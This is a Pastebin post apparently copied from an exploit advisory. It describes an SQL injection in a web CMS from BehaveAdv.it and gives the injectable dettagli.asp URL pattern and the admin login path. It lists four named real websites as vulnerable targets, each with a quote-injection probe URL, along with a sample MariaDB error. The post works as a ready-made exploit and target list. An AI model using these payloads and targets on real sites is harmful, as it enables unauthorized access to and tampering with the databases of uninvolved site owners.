KingSkrupellos

Project By BehaveAdv.it SQL Injection

Oct 10th, 2019
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.66 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Project By BehaveAdv.it SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 11/10/2019
  7. # Vendor Homepage : behaveadv.it
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ###################################################################
  18.  
  19. # Impact :
  20. ***********
  21. Project By BehaveAdv.it is prone to an SQL-injection
  22. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  23. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  24. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  25. A remote attacker can send a specially crafted request to the vulnerable application and
  26. execute arbitrary SQL commands in application`s database. Further exploitation of this
  27. vulnerability may result in unauthorized data manipulation.
  28. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  29.  
  30. ###################################################################
  31.  
  32. # Admin Panel Login Path :
  33. ************************
  34. /it/10/Area_Riservata/
  35.  
  36. # SQL Injection Exploit :
  37. **********************
  38. /dettagli.asp?sid=[ID-NUMBER]&idp=[SQL Injection]&categoria=[ID-NUMBER]
  39.  
  40. ###################################################################
  41.  
  42. # Example Vulnerable Sites :
  43. *************************
  44. [+] mangialacultura.it/dettagli.asp?sid=1&idp=1%27&categoria=1
  45.  
  46. [+] paganopiante.it/dettagli.asp?sid=1&idp=1%27&categoria=1
  47.  
  48. [+] necofarma.com/dettagli.asp?sid=1&idp=1%27&categoria=1
  49.  
  50. [+] sipav.org/dettagli.asp?sid=1&idp=1%27&categoria=1
  51.  
  52. ###################################################################
  53.  
  54. # Example SQL Database Error :
  55. ****************************
  56. frontend_menu SQLSTATE[42000]: Syntax error or access violation: 1064
  57. You have an error in your SQL syntax; check the manual that corresponds to
  58. your MariaDB server version for the right syntax to use near ') left join
  59. zfw_pagine_menu m on p.id=m.id_pagina WHERE p.pubblica=1
  60. and p.id_pa' at line 1
  61.  
  62. ###################################################################
  63.  
  64. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  65.  
  66. ###################################################################
Add Comment
Please, Sign In to add comment